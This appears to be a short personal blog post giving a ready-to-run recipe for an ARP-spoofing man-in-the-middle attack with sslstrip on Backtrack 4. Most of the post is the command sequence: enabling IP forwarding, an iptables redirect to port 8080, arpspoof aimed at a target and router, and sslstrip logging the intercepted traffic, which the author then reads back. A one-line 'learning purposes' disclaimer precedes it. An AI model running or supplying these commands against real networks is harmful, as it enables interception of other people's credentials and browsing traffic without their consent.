Hello, I'm aware this post won't be very relevant to most people reading my blog, but I always feel that posting something that isn't necessarily useful to my readers may still prove useful to random people searching for information online. Therefore, I'd suggest most people that read my blog to just ignore any posts with the tag "backtrack" as this is pretty much only useful to someone who knows what backtrack is and how to use it. Also I would like to say to anyone that does read it, that this information is here for learning purposes and obviously I hope no one uses it with ill intentions.
So here we go, this is an easy method to do arpspoofing using sslstrip on Backtrack 4 r2 which is what I use.
-new console-
echo "1" > /proc/sys/net/ipv4/ip_forward
[enter]
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
[enter]
arpspoof -i eth0 -t (target IP) (router IP)
[enter]
-new console-
cd /usr/bin/ && ./sslstrip -l 8080 -w /root/sslstrip.log
[enter]
-new console-
cat /root/sslstrip.log
[enter] to view results
enjoy, thanks to AzraelSepultura from BT4 forum for this sslstrip method, after a few different ones, this worked for me.
No comments:
Post a Comment